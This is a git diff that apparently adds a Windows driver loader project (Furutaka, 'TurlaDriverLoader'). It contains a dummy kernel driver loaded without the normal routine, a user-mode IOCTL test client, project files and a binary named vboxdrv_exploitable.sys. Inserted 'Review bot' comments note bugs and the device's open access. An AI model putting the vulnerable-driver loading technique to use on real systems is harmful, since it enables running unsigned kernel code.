+*******************************************************************************/
+#include
+#include "main.h"
+
+#define DEBUGPRINT
+
+/*
+* DevioctlDispatch
+*
+* Purpose:
+*
+* IRP_MJ_DEVICE_CONTROL dispatch.
+*
+*/
+NTSTATUS DevioctlDispatch(
+ _In_ struct _DEVICE_OBJECT *DeviceObject,
+ _Inout_ struct _IRP *Irp
+ )
+{
+ NTSTATUS status = STATUS_SUCCESS;
+ ULONG bytesIO = 0;
+ PIO_STACK_LOCATION stack;
+ BOOLEAN condition = FALSE;
+ PINOUTPARAM rp, wp;
+
+ UNREFERENCED_PARAMETER(DeviceObject);
+
+#ifdef DEBUGPRINT
+ DbgPrint("%s IRP_MJ_DEVICE_CONTROL", __FUNCTION__);
+#endif
+
+ stack = IoGetCurrentIrpStackLocation(Irp);
+
+ do {
+
+ if (stack == NULL) {
+ status = STATUS_INTERNAL_ERROR;
+ break;
+ }
+
+ rp = (PINOUTPARAM)Irp->AssociatedIrp.SystemBuffer;
+ wp = (PINOUTPARAM)Irp->AssociatedIrp.SystemBuffer;
+ if (rp == NULL) {
+ status = STATUS_INVALID_PARAMETER;
+ break;
+ }
+
+ switch (stack->Parameters.DeviceIoControl.IoControlCode) {
+ case DUMMYDRV_REQUEST1:
+
+#ifdef DEBUGPRINT
+ DbgPrint("%s DUMMYDRV_REQUEST1 hit", __FUNCTION__);
+#endif
+ if (stack->Parameters.DeviceIoControl.InputBufferLength != sizeof(INOUT_PARAM)) {
+ status = STATUS_INVALID_PARAMETER;
+ break;
+ }
+
+#ifdef DEBUGPRINT
+ DbgPrint("%s in params = %lx, %lx, %lx, %lx", __FUNCTION__,
+ rp->Param1, rp->Param2, rp->Param3, rp->Param4);
+#endif
+
+ wp->Param1 = 11111111;
+ wp->Param2 = 22222222;
+ wp->Param3 = 33333333;
+ wp->Param4 = 44444444;
+
+ status = STATUS_SUCCESS;
+ bytesIO = sizeof(INOUT_PARAM);
+
+ break;
+
+ default:
+
+#ifdef DEBUGPRINT
+ DbgPrint("%s hit with invalid IoControlCode", __FUNCTION__);
+#endif
+ status = STATUS_INVALID_PARAMETER;
+ };
+
+ } while (condition);
+
+ Irp->IoStatus.Status = status;
+ Irp->IoStatus.Information = bytesIO;
+ IoCompleteRequest(Irp, IO_NO_INCREMENT);
+ return status;
+}
+
+/*
+* UnsupportedDispatch
+*
+* Purpose:
+*
+* Unused IRP_MJ_* dispatch.
+*
+*/
+NTSTATUS UnsupportedDispatch(
+ _In_ struct _DEVICE_OBJECT *DeviceObject,
+ _Inout_ struct _IRP *Irp
+ )
+{
+ UNREFERENCED_PARAMETER(DeviceObject);
+
+ Irp->IoStatus.Status = STATUS_NOT_SUPPORTED;
+ IoCompleteRequest(Irp, IO_NO_INCREMENT);
+ return Irp->IoStatus.Status;
+}
+
+/*
+* CreateDispatch
+*
+* Purpose:
+*
+* IRP_MJ_CREATE dispatch.
+*
+*/
+NTSTATUS CreateDispatch(
+ _In_ struct _DEVICE_OBJECT *DeviceObject,
+ _Inout_ struct _IRP *Irp
+ )
+{
+ UNREFERENCED_PARAMETER(DeviceObject);
+
+#ifdef DEBUGPRINT
+ DbgPrint("%s Create", __FUNCTION__);
+#endif
+
+ IoCompleteRequest(Irp, IO_NO_INCREMENT);
+ return Irp->IoStatus.Status;
+}
+
+/*
+* CloseDispatch
+*
+* Purpose:
+*
+* IRP_MJ_CLOSE dispatch.
+*
+*/
+NTSTATUS CloseDispatch(
+ _In_ struct _DEVICE_OBJECT *DeviceObject,
+ _Inout_ struct _IRP *Irp
+ )
+{
+ UNREFERENCED_PARAMETER(DeviceObject);
+
+#ifdef DEBUGPRINT
+ DbgPrint("%s Close", __FUNCTION__);
+#endif
+
+ IoCompleteRequest(Irp, IO_NO_INCREMENT);
+ return Irp->IoStatus.Status;
+}
+
+VOID ListModules(
+ _In_ struct _DRIVER_OBJECT *DriverObject
+ )
+{
+ PLIST_ENTRY entry0, entry1;
+ KLDR_DATA_TABLE_ENTRY *section = (KLDR_DATA_TABLE_ENTRY*)DriverObject->DriverSection;
+
+ if (section == NULL)
+ return;
+
+ entry0 = section->InLoadOrderLinks.Flink;
+ entry1 = entry0;
+
+ do {
+ section = (KLDR_DATA_TABLE_ENTRY*)CONTAINING_RECORD(entry1, KLDR_DATA_TABLE_ENTRY, InLoadOrderLinks);
+ DbgPrint("Section=%p, %wZ", section, section->BaseDllName);
+ entry1 = entry1->Flink;
+ } while (entry1 != entry0);
+}
+
+/*
+* DriverInitialize
+*
+* Purpose:
+*
+* Driver main.
+*
+*/
+NTSTATUS DriverInitialize(
+ _In_ struct _DRIVER_OBJECT *DriverObject,
+ _In_ PUNICODE_STRING RegistryPath
+ )
+{
+ NTSTATUS status;
+ UNICODE_STRING SymLink, DevName/*, DrvRefName*/;
+ PDEVICE_OBJECT devobj;
+ ULONG t;
+ WCHAR szDevName[] = { L'\\', L'D', L'e', L'v', L'i', L'c', L'e', L'\\', L'T', L'D', L'L', L'D', 0 };
+ WCHAR szSymLink[] = { L'\\', L'D', L'o', L's', L'D', L'e', L'v', L'i', L'c', L'e', L's', L'\\', L'T', L'D', L'L', L'D', 0 };
+// WCHAR szNullDrv[] = { L'\\', L'D', L'r', L'i', L'v', L'e', L'r', L'\\', L'N', L'u', L'l', L'l', 0 };
+// PDRIVER_OBJECT driverObject;
+
+ //RegistryPath is NULL
+ UNREFERENCED_PARAMETER(RegistryPath);
+
+#ifdef DEBUGPRINT
+ DbgPrint("%s", __FUNCTION__);
+#endif
+
+ RtlInitUnicodeString(&DevName, szDevName);
+ status = IoCreateDevice(DriverObject, 0, &DevName, FILE_DEVICE_UNKNOWN, FILE_DEVICE_SECURE_OPEN, TRUE, &devobj);
+
+#ifdef DEBUGPRINT
+ DbgPrint("%s IoCreateDevice(%wZ) = %lx", __FUNCTION__, DevName, status);
+#endif
+
+ if (!NT_SUCCESS(status)) {
+ return status;
+ }
+
+ RtlInitUnicodeString(&SymLink, szSymLink);
+ status = IoCreateSymbolicLink(&SymLink, &DevName);
+
+#ifdef DEBUGPRINT
+ DbgPrint("%s IoCreateSymbolicLink(%wZ) = %lx", __FUNCTION__, SymLink, status);
+#endif
+
+ devobj->Flags |= DO_BUFFERED_IO;
+
+ for (t = 0; t <= IRP_MJ_MAXIMUM_FUNCTION; t++)
+ DriverObject->MajorFunction[t] = &UnsupportedDispatch;
+
+ DriverObject->MajorFunction[IRP_MJ_DEVICE_CONTROL] = &DevioctlDispatch;
+ DriverObject->MajorFunction[IRP_MJ_CREATE] = &CreateDispatch;
+ DriverObject->MajorFunction[IRP_MJ_CLOSE] = &CloseDispatch;
+ DriverObject->DriverUnload = NULL; //nonstandard way of driver loading, no unload
+
+ devobj->Flags &= ~DO_DEVICE_INITIALIZING;
+/*
+ RtlInitUnicodeString(&DrvRefName, szNullDrv);
+ if (NT_SUCCESS(ObReferenceObjectByName(&DrvRefName, OBJ_CASE_INSENSITIVE, NULL, 0,
+ *IoDriverObjectType, KernelMode, NULL, &driverObject)))
+ {
+ DbgPrint("drvObj %p", driverObject);
+ ListModules(driverObject);
+ ObDereferenceObject(driverObject);
+ }
+ */
+
+ return status;
+}
+
+/*
+* DriverEntry
+*
+* Purpose:
+*
+* Driver base entry point.
+*
+*/
+NTSTATUS DriverEntry(
+ _In_ struct _DRIVER_OBJECT *DriverObject,
+ _In_ PUNICODE_STRING RegistryPath
+)
+{
+ NTSTATUS status;
+ UNICODE_STRING drvName;
+ WCHAR szDrvName[] = { L'\\', L'D', L'r', L'i', L'v', L'e', L'r', L'\\', L'T', L'D', L'L', L'D', 0 };
+
+ /* This parameters are invalid due to nonstandard way of loading and should not be used. */
+ UNREFERENCED_PARAMETER(DriverObject);
+ UNREFERENCED_PARAMETER(RegistryPath);
+
+#ifdef DEBUGPRINT
+ DbgPrint("%s", __FUNCTION__);
+#endif
+
+ RtlInitUnicodeString(&drvName, szDrvName);
+ status = IoCreateDriver(&drvName, &DriverInitialize);
+
+#ifdef DEBUGPRINT
+ DbgPrint("%s IoCreateDriver(%wZ) = %lx", __FUNCTION__, drvName, status);
+#endif
+
+ return status;
+}
diff --git a/Source/DummyDrv2/dummy/main.h b/Source/DummyDrv2/dummy/main.h
new file mode 100644
index 0000000..e69a424
--- /dev/null
+++ b/Source/DummyDrv2/dummy/main.h
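Review bot: CreateDispatch, CloseDispatch and UnsupportedDispatch read `Irp->IoStatus.Status` after `IoCompleteRequest(Irp, IO_NO_INCREMENT)`, which touches an IRP the I/O manager may already have freed, and CreateDispatch/CloseDispatch never set `Irp->IoStatus.Status` before completing; set the status into the IRP first and return a local copy, e.g. `Irp->IoStatus.Status = STATUS_SUCCESS; IoCompleteRequest(Irp, IO_NO_INCREMENT); return STATUS_SUCCESS;`. In DevioctlDispatch the DUMMYDRV_REQUEST1 case validates only InputBufferLength but writes `sizeof(INOUT_PARAM)` bytes back through the same SystemBuffer and reports that length in Information, so the guard should be `if (stack->Parameters.DeviceIoControl.InputBufferLength != sizeof(INOUT_PARAM) || stack->Parameters.DeviceIoControl.OutputBufferLength < sizeof(INOUT_PARAM))` (METHOD_BUFFERED sizes SystemBuffer from the larger of the two lengths, so the kernel-side write stays in bounds, but the I/O manager copies Information bytes back into the caller's output buffer at completion without re-checking its length). In DriverInitialize the result of `IoCreateSymbolicLink` is stored but never tested, so on failure the device object is left behind with the dispatch table installed while the function returns an error; add `if (!NT_SUCCESS(status)) { IoDeleteDevice(devobj); return status; }` directly after the call. The `%wZ` conversions in the DbgPrint calls receive `DevName`, `SymLink`, `drvName` and `section->BaseDllName` by value where the format expects a `PUNICODE_STRING`; pass `&DevName` etc., since this presumably only works today because the x64 calling convention passes a 16-byte struct vararg by reference to a copy. Finally, DUMMYDRV_REQUEST1 is declared with FILE_SPECIAL_ACCESS and the device is created with IoCreateDevice's default security descriptor, so any local user who can open `\DosDevices\TDLD` can issue it; for a sample that will be copied into real drivers, either create the device with IoCreateDeviceSecure and an administrators-only SDDL or state in a comment that the device is intentionally left open.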
@@ -0,0 +1,112 @@
+/*******************************************************************************
+*
+* (C) COPYRIGHT AUTHORS, 2016
+*
+* TITLE: MAIN.H
+*
+* VERSION: 1.00
+*
+* DATE: 29 Jan 2016
+*
+* THIS CODE AND INFORMATION IS PROVIDED "AS IS" WITHOUT WARRANTY OF
+* ANY KIND, EITHER EXPRESSED OR IMPLIED, INCLUDING BUT NOT LIMITED
+* TO THE IMPLIED WARRANTIES OF MERCHANTABILITY AND/OR FITNESS FOR A
+* PARTICULAR PURPOSE.
+*
+*******************************************************************************/
+
+#pragma once
+
+NTKERNELAPI
+NTSTATUS
+IoCreateDriver(
+ IN PUNICODE_STRING DriverName, OPTIONAL
+ IN PDRIVER_INITIALIZE InitializationFunction
+ );
+
+NTKERNELAPI
+NTSTATUS
+ObReferenceObjectByName(
+ __in PUNICODE_STRING ObjectName,
+ __in ULONG Attributes,
+ __in_opt PACCESS_STATE AccessState,
+ __in_opt ACCESS_MASK DesiredAccess,
+ __in POBJECT_TYPE ObjectType,
+ __in KPROCESSOR_MODE AccessMode,
+ __inout_opt PVOID ParseContext,
+ __out PVOID *Object
+ );
+
+extern POBJECT_TYPE *IoDriverObjectType;
+
+_Dispatch_type_(IRP_MJ_DEVICE_CONTROL)
+DRIVER_DISPATCH DevioctlDispatch;
+_Dispatch_type_(IRP_MJ_CREATE)
+DRIVER_DISPATCH CreateDispatch;
+_Dispatch_type_(IRP_MJ_CLOSE)
+DRIVER_DISPATCH CloseDispatch;
+
+_Dispatch_type_(IRP_MJ_CREATE)
+_Dispatch_type_(IRP_MJ_CREATE_NAMED_PIPE)
+_Dispatch_type_(IRP_MJ_CLOSE)
+_Dispatch_type_(IRP_MJ_READ)
+_Dispatch_type_(IRP_MJ_WRITE)
+_Dispatch_type_(IRP_MJ_QUERY_INFORMATION)
+_Dispatch_type_(IRP_MJ_SET_INFORMATION)
+_Dispatch_type_(IRP_MJ_QUERY_EA)
+_Dispatch_type_(IRP_MJ_SET_EA)
+_Dispatch_type_(IRP_MJ_FLUSH_BUFFERS)
+_Dispatch_type_(IRP_MJ_QUERY_VOLUME_INFORMATION)
+_Dispatch_type_(IRP_MJ_SET_VOLUME_INFORMATION)
+_Dispatch_type_(IRP_MJ_DIRECTORY_CONTROL)
+_Dispatch_type_(IRP_MJ_FILE_SYSTEM_CONTROL)
+_Dispatch_type_(IRP_MJ_DEVICE_CONTROL)
+_Dispatch_type_(IRP_MJ_INTERNAL_DEVICE_CONTROL)
+_Dispatch_type_(IRP_MJ_SHUTDOWN)
+_Dispatch_type_(IRP_MJ_LOCK_CONTROL)
+_Dispatch_type_(IRP_MJ_CLEANUP)
+_Dispatch_type_(IRP_MJ_CREATE_MAILSLOT)
+_Dispatch_type_(IRP_MJ_QUERY_SECURITY)
+_Dispatch_type_(IRP_MJ_SET_SECURITY)
+_Dispatch_type_(IRP_MJ_POWER)
+_Dispatch_type_(IRP_MJ_SYSTEM_CONTROL)
+_Dispatch_type_(IRP_MJ_DEVICE_CHANGE)
+_Dispatch_type_(IRP_MJ_QUERY_QUOTA)
+_Dispatch_type_(IRP_MJ_SET_QUOTA)
+_Dispatch_type_(IRP_MJ_PNP)
+DRIVER_DISPATCH UnsupportedDispatch;
+
+DRIVER_INITIALIZE DriverInitialize;
+DRIVER_INITIALIZE DriverEntry;
+#pragma alloc_text(INIT, DriverEntry)
+
+#define DUMMYDRV_REQUEST1 CTL_CODE(FILE_DEVICE_UNKNOWN, 0x0701, METHOD_BUFFERED, FILE_SPECIAL_ACCESS)
+
+typedef struct _INOUT_PARAM {
+ ULONG Param1;
+ ULONG Param2;
+ ULONG Param3;
+ ULONG Param4;
+} INOUT_PARAM, *PINOUTPARAM;
+
+typedef struct _KLDR_DATA_TABLE_ENTRY {
+ LIST_ENTRY InLoadOrderLinks;
+ PVOID ExceptionTable;
+ ULONG ExceptionTableSize;
+ // ULONG padding on IA64
+ PVOID GpValue;
+ PVOID NonPagedDebugInfo;
+ PVOID DllBase;
+ PVOID EntryPoint;
+ ULONG SizeOfImage;
+ UNICODE_STRING FullDllName;
+ UNICODE_STRING BaseDllName;
+ ULONG Flags;
+ USHORT LoadCount;
+ USHORT __Unused5;
+ PVOID SectionPointer;
+ ULONG CheckSum;
+ // ULONG padding on IA64
+ PVOID LoadedImports;
+ PVOID PatchInformation;
+} KLDR_DATA_TABLE_ENTRY, *PKLDR_DATA_TABLE_ENTRY;
diff --git a/Source/DummyDrv2/dummy/r3request.c b/Source/DummyDrv2/dummy/r3request.c
new file mode 100644
index 0000000..9377f3d
--- /dev/null
+++ b/Source/DummyDrv2/dummy/r3request.c
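Review bot: `USHORT __Unused5;` in KLDR_DATA_TABLE_ENTRY uses an identifier beginning with a double underscore, which C reserves for the implementation; `USHORT Unused5;` removes the collision risk without changing the layout. The INOUT_PARAM structure declared here and the one in r3request.c are two separate definitions of the same wire format with different pointer typedef names (`PINOUTPARAM` here, `PINOUT_PARAM` there), so a single shared header would keep the kernel and user sides from drifting apart. KLDR_DATA_TABLE_ENTRY and the IoCreateDriver/ObReferenceObjectByName prototypes are undocumented definitions whose layout is not stable across Windows builds, so a header comment recording which build they were taken from would help whoever has to adjust them later; the IA64 padding remarks suggest they were copied from an older definition, though that is an inference.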
@@ -0,0 +1,34 @@
+typedef struct _INOUT_PARAM{
+ ULONG Param1;
+ ULONG Param2;
+ ULONG Param3;
+ ULONG Param4;
+} INOUT_PARAM, *PINOUT_PARAM;
+
+#define DUMMYDRV_REQUEST1 CTL_CODE(FILE_DEVICE_UNKNOWN, 0x0701, METHOD_BUFFERED, FILE_SPECIAL_ACCESS)
+
+VOID test(
+ VOID
+ )
+{
+ HANDLE h;
+ INOUT_PARAM tmp;
+ DWORD bytesIO;
+
+ h = CreateFile(TEXT("\\\\.\\TDLD"), GENERIC_READ | GENERIC_WRITE,
+ FILE_SHARE_READ | FILE_SHARE_WRITE, NULL, OPEN_EXISTING, 0, NULL);
+ if (h != INVALID_HANDLE_VALUE) {
+
+ tmp.Param1 = 0xAAAAAAAA;
+ tmp.Param2 = 0xBBBBBBBB;
+ tmp.Param3 = 0xCCCCCCCC;
+ tmp.Param4 = 0xDDDDDDDD;
+
+ DeviceIoControl(h, DUMMYDRV_REQUEST1,
+ &tmp, sizeof(tmp), &tmp,
+ sizeof(tmp), &bytesIO, NULL);
+
+ CloseHandle(h);
+ }
+
+}
\ No newline at end of file
diff --git a/Source/Furutaka/Furutaka.sln b/Source/Furutaka/Furutaka.sln
new file mode 100644
index 0000000..ff6fb44
--- /dev/null
+++ b/Source/Furutaka/Furutaka.sln
@@ -0,0 +1,22 @@
+
+Microsoft Visual Studio Solution File, Format Version 12.00
+# Visual Studio 14
+VisualStudioVersion = 14.0.24720.0
+MinimumVisualStudioVersion = 10.0.40219.1
+Project("{8BC9CEB8-8B4A-11D0-8D11-00A0C91BC942}") = "Furutaka", "Furutaka.vcxproj", "{8CC15B84-9FA8-4F5E-934F-7DAE7BAC4896}"
+EndProject
+Global
+ GlobalSection(SolutionConfigurationPlatforms) = preSolution
+ Debug|x64 = Debug|x64
+ Release|x64 = Release|x64
+ EndGlobalSection
+ GlobalSection(ProjectConfigurationPlatforms) = postSolution
+ {8CC15B84-9FA8-4F5E-934F-7DAE7BAC4896}.Debug|x64.ActiveCfg = Debug|x64
+ {8CC15B84-9FA8-4F5E-934F-7DAE7BAC4896}.Debug|x64.Build.0 = Debug|x64
+ {8CC15B84-9FA8-4F5E-934F-7DAE7BAC4896}.Release|x64.ActiveCfg = Release|x64
+ {8CC15B84-9FA8-4F5E-934F-7DAE7BAC4896}.Release|x64.Build.0 = Release|x64
+ EndGlobalSection
+ GlobalSection(SolutionProperties) = preSolution
+ HideSolutionNode = FALSE
+ EndGlobalSection
+EndGlobal
diff --git a/Source/Furutaka/Furutaka.vcxproj b/Source/Furutaka/Furutaka.vcxproj
new file mode 100644
index 0000000..8a78707
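Review bot: `test()` ignores the return value of DeviceIoControl, so a failed request (driver not loaded, IOCTL rejected, buffer refused) looks exactly like success, and `bytesIO` is written but never inspected; wrapping it as `if (!DeviceIoControl(...)) { /* report GetLastError() */ }` would make the probe informative. The file has no includes and redeclares `INOUT_PARAM` and `DUMMYDRV_REQUEST1` from main.h with a different pointer typedef name (`PINOUT_PARAM` here, `PINOUTPARAM` there), so the two copies can drift apart; a shared header for the IOCTL contract would remove the duplication. The `CreateFile`/`DeviceIoControl` calls suggest this is a user-mode test client even though it sits in the driver directory, so a header comment saying so, plus the missing `#include <windows.h>`, would make the intent and build context clear. The file also lacks a trailing newline.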
--- /dev/null +++ b/Source/Furutaka/Furutaka.vcxproj @@ -0,0 +1,217 @@ + + + + + Debug + Win32 + + + Release + Win32 + + + Debug + x64 + + + Release + x64 + + + + {8CC15B84-9FA8-4F5E-934F-7DAE7BAC4896} + Win32Proj + Furutaka + 8.1 + Furutaka + + + + Application + true + v140 + Unicode + + + Application + false + v140 + true + Unicode + + + Application + true + v140 + Unicode + + + Application + false + v140 + true + Unicode + + + + + + + + + + + + + + + + + + + + + true + .\output\$(Platform)\$(Configuration)\ + .\output\$(Platform)\$(Configuration)\ + + + true + .\output\$(Platform)\$(Configuration)\ + .\output\$(Platform)\$(Configuration)\ + + + false + .\output\$(Platform)\$(Configuration)\ + .\output\$(Platform)\$(Configuration)\ + AllRules.ruleset + + + false + .\output\$(Platform)\$(Configuration)\ + .\output\$(Platform)\$(Configuration)\ + NativeRecommendedRules.ruleset + false + + + + + + Level4 + Disabled + WIN32;_DEBUG;_CONSOLE;%(PreprocessorDefinitions) + true + CompileAsC + + + Console + true + TDLMain + RequireAdministrator + + + + + + + Level4 + Disabled + _DEBUG;_CONSOLE;%(PreprocessorDefinitions) + true + CompileAsC + + + Console + true + TDLMain + RequireAdministrator + + + + + Level4 + + + MaxSpeed + true + true + WIN32;NDEBUG;_CONSOLE;%(PreprocessorDefinitions) + true + CompileAsC + true + + + Console + true + true + true + TDLMain + true + RequireAdministrator + + + + + Level4 + + + MaxSpeed + true + true + NDEBUG;_CONSOLE;%(PreprocessorDefinitions) + true + CompileAsC + true + true + false + + + Console + true + true + true + TDLMain + true + RequireAdministrator + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + \ No newline at end of file diff --git a/Source/Furutaka/Furutaka.vcxproj.filters b/Source/Furutaka/Furutaka.vcxproj.filters new file mode 100644 index 0000000..57970a6 --- /dev/null +++ b/Source/Furutaka/Furutaka.vcxproj.filters 
@@ -0,0 +1,110 @@ + + + + + {4FC737F1-C7A5-4376-A066-2A32D752A2FF} + cpp;c;cc;cxx;def;odl;idl;hpj;bat;asm;asmx + + + {93995380-89BD-4b04-88EB-625FBE52EBFB} + h;hh;hpp;hxx;hm;inl;inc;xsd + + + {67DA6AB6-F800-4c08-8B7A-83BB121AAD01} + rc;ico;cur;bmp;dlg;rc2;rct;bin;rgs;gif;jpg;jpeg;jpe;resx;tiff;tif;png;wav;mfcribbon-ms + + + {b42df48e-a336-4e0e-9516-5a3ed47473ce} + + + + + Source Files + + + minirtl + + + minirtl + + + minirtl + + + minirtl + + + minirtl + + + minirtl + + + minirtl + + + minirtl + + + minirtl + + + minirtl + + + minirtl + + + Source Files + + + Source Files + + + Source Files + + + + + Header Files + + + Header Files + + + minirtl + + + minirtl + + + minirtl + + + Header Files + + + Header Files + + + Header Files + + + Header Files + + + Header Files + + + Header Files + + + + + Resource Files + + + + + + \ No newline at end of file diff --git a/Source/Furutaka/Furutaka.vcxproj.user b/Source/Furutaka/Furutaka.vcxproj.user new file mode 100644 index 0000000..8f42863 --- /dev/null +++ b/Source/Furutaka/Furutaka.vcxproj.user @@ -0,0 +1,19 @@ + + + + C:\MAKEEXE\TurlaDriverLoader\Loader\drv\Tsugumi.sys + WindowsLocalDebugger + + + C:\MAKEEXE\TurlaDriverLoader\Loader\drv\Tsugumi.sys + WindowsLocalDebugger + + + C:\MAKEEXE\TurlaDriverLoader\Loader\drv\TsugumiKernel.sys + WindowsLocalDebugger + + + C:\MAKEEXE\TurlaDriverLoader\Loader\drv\TsugumiKernel.sys + WindowsLocalDebugger + + \ No newline at end of file diff --git a/Source/Furutaka/cui.c b/Source/Furutaka/cui.c new file mode 100644 index 0000000..39f6777 --- /dev/null +++ b/Source/Furutaka/cui.c 
@@ -0,0 +1,64 @@
+/*******************************************************************************
+*
+* (C) COPYRIGHT AUTHORS, 2016
+*
+* TITLE: CUI.C
+*
+* VERSION: 1.00
+*
+* DATE: 18 Jan 2016
+*
+* Console output.
+*
+* THIS CODE AND INFORMATION IS PROVIDED "AS IS" WITHOUT WARRANTY OF
+* ANY KIND, EITHER EXPRESSED OR IMPLIED, INCLUDING BUT NOT LIMITED
+* TO THE IMPLIED WARRANTIES OF MERCHANTABILITY AND/OR FITNESS FOR A
+* PARTICULAR PURPOSE.
+*
+*******************************************************************************/
+#include "global.h"
+
+/*
+* cuiPrintText
+*
+* Purpose:
+*
+* Output text to the console or file.
+*
+*/
+VOID cuiPrintText(
+ _In_ HANDLE hOutConsole,
+ _In_ LPWSTR lpText,
+ _In_ BOOL ConsoleOutputEnabled,
+ _In_ BOOL UseReturn
+ )
+{
+ SIZE_T consoleIO;
+ DWORD bytesIO;
+ LPWSTR Buffer;
+
+ if (lpText == NULL)
+ return;
+
+ consoleIO = _strlen(lpText);
+ if ((consoleIO == 0) || (consoleIO > MAX_PATH * 4))
+ return;
+
+ consoleIO = consoleIO * sizeof(WCHAR) + 4 + sizeof(UNICODE_NULL);
+ Buffer = (LPWSTR)RtlAllocateHeap(RtlGetCurrentPeb()->ProcessHeap, HEAP_ZERO_MEMORY, consoleIO);
+ if (Buffer) {
+
+ _strcpy(Buffer, lpText);
+ if (UseReturn) _strcat(Buffer, TEXT("\r\n"));
+
+ consoleIO = _strlen(Buffer);
+
+ if (ConsoleOutputEnabled == TRUE) {
+ WriteConsole(hOutConsole, Buffer, (DWORD)consoleIO, &bytesIO, NULL);
+ }
+ else {
+ WriteFile(hOutConsole, Buffer, (DWORD)(consoleIO * sizeof(WCHAR)), &bytesIO, NULL);
+ }
+ RtlFreeHeap(RtlGetCurrentPeb()->ProcessHeap, 0, Buffer);
+ }
+}
diff --git a/Source/Furutaka/cui.h b/Source/Furutaka/cui.h
new file mode 100644
index 0000000..a2ded5f
--- /dev/null
+++ b/Source/Furutaka/cui.h
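Review bot: `lpText` is only read (`_strlen`, `_strcpy`), so the parameter should be `_In_ LPCWSTR lpText`, here and in the matching prototype in cui.h, so the compiler can reject accidental writes through it. The `+ 4` in the allocation size is the two WCHARs appended by the `_strcat(Buffer, TEXT("\r\n"))` below; writing it as `2 * sizeof(WCHAR)` or a named constant makes that dependency visible instead of leaving a magic number. The `MAX_PATH * 4` cap silently drops longer messages with no signal to the caller, and the WriteConsole/WriteFile results are discarded; both may be fine for best-effort console logging, but a comment such as `// best-effort output: truncation and write failures are deliberately ignored` would record that decision.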
@@ -0,0 +1,28 @@
+/*******************************************************************************
+*
+* (C) COPYRIGHT AUTHORS, 2016
+*
+* TITLE: CUI.H
+*
+* VERSION: 1.00
+*
+* DATE: 18 Jan 2016
+*
+* Common header file for console ui.
+*
+* THIS CODE AND INFORMATION IS PROVIDED "AS IS" WITHOUT WARRANTY OF
+* ANY KIND, EITHER EXPRESSED OR IMPLIED, INCLUDING BUT NOT LIMITED
+* TO THE IMPLIED WARRANTIES OF MERCHANTABILITY AND/OR FITNESS FOR A
+* PARTICULAR PURPOSE.
+*
+*******************************************************************************/
+#pragma once
+
+#include "global.h"
+
+VOID cuiPrintText(
+ _In_ HANDLE hOutConsole,
+ _In_ LPWSTR lpText,
+ _In_ BOOL ConsoleOutputEnabled,
+ _In_ BOOL UseReturn
+ );
diff --git a/Source/Furutaka/drv/vboxdrv_exploitable.sys b/Source/Furutaka/drv/vboxdrv_exploitable.sys new file mode 100644 index 0000000000000000000000000000000000000000..8788e4ce7dd88e80846a650c8afeab3676fe6e24 GIT binary patch literal 68288 zcmeFa4}4U`)i-`Oe>Z>N2FPmoqh2Iv6p9N$8w}`fvI%!#10e*A0uo4qi9!-Ldm)Ni z!V+P_hwMJ{}jgdB5#Xzn5`<|J5ckgZz z+WNfp_k7-u`Q+Z2J9p;HnRCvZIdf+2Y}pOFg+xIRl5mB?g3y7G{v7On?%N<<&cd$gTlo^MuJrcse&L?^Hj$e#ECEp~<*T3Bq1Hmfs@? zQ_T7PPJGWUL3o5CG-A$KzPeT)-ZZvz{I}_$IkO}P^|QRS>wN13q3Uu$Aehy9XwK&l z1bG(ECI}bc&Hu(_gr6dw*G<*Ho) zPp(z&)N%rqxtX&6VAiUxBc{K)dy=N_KyGngh^4zkiAVH2;=WFocyTm|-i!MVBdwF= zmjkPFt=FMWNmjR0XOva9LsrkqYL#79m*;3dT_6Z0`LE?4_XJku$m&r~U~Pdbu+|>7 z9os>T~8-*taHs)r@0bg#;bXtsa8v}JnDuV|4@#%%vtElwJN1f)s>q$uf(d%NAWWCh+BQxqjqT}z^Xl@ zTatn4nb6U_YM zVcP*ev>831Y+i&%2L!=X`pA(vQC6^Y`TJIY+4e~|EZ-8U?K%?S2dMw5?C)#_od9@8 z$d@YzZPa_@peI)f+x$q?qsMw^zyPdjKi!*pDLquUQj(7nzV(j}rc} z+DolpyQcpgsuQy1ATf|Vf!f@1kNU7MP7pj04yinQ~2+TRlvD&xP(~sx8t|`>Or{)Mw%_ zgNF`uvfGuLN908)AwVBG>|}K~#eHB?fM_4Kz0pQwN*oYaA9Aef;`qqwf&ABG^&5<3 zYERhqYvdb9^gkC?yFg%jR0p`!wjn_B1Ot0fiQIi)@B~B&awCVQ?;~a`S`z&s3ku{i_indCrsc$E!*At>x>%R!>YxtT)d9K09dB`WTIde- zj{8^^2PF}|p50MrsB6Q9-BXcyGAg!FouH7Fsb-q zN6~Zi+`BHs`1Un232L(df?VY=z-B>#Mlmif<@8w`+F7)W?+yc3~BnLtwXx{}2?IHDq zg3gAM8QO%&kA#ucqb_rJ)O$Kmjazj>&6npmRcFqEME}KtZ}Ngv3bGeu zP%y@$cDvPQwf{oT8d!p%yX%Pr6r;f#ebu8LaI43)pMYB8zUL@0|24f0WHrj_(&m6= zAYDBnt9RrU1Qyy^E5o*lXc}*oowv%Qz6^PXkdV+zBq>0#KR*mTCKDqAcjS6xjJom@ zWO;^dDiNwZB&&nsjs>8l{Nu0)gxaSf4xI<}y`M4yUl~QEu&qKb5NIduChpJ}uF!F_ z@!~Pd6F00+0NB^>;Myu|JC4{BUzu$Y3OmK(p8Vq-+rIgr@W}`2iH_^f|3Ak*d8_li zF@Xn22co|rE5>v=&`vrnY&*)Hf9p}r%3FON5-ZVYybwpNz>-9aSpM*3lveh57-Y+Hj@`-vy)X(65*;=Whd!yG*LyP-q7 z9R9Gwdni9Na4C>`@_fi!*!JjFD0CY=lZawmqvvGylJmwv(#OUv>c5czS(hhWA60W* z^e&MU%Eb}3Z3G-o@S)soz{wMI@vS zumI)W++7H@%croHyLQqrqTTzqaF{A@yd`I9i>7v_MwG65(*T{jYX%6z$WQ!Ns`GZX+N%R@WO^ghav9k zI$u^%=nu#RyIKNXfSI9P37B$sB7ZdUtKHO0W2EH`i^ES=&tQU8u025T)TL7XX*sZ^ zT)Ue+iik_vNe{hRYn9tylLKExlGQhP11AR2Lw!zGS6Q`>YLKh_HRaF9imBF?EIjze 
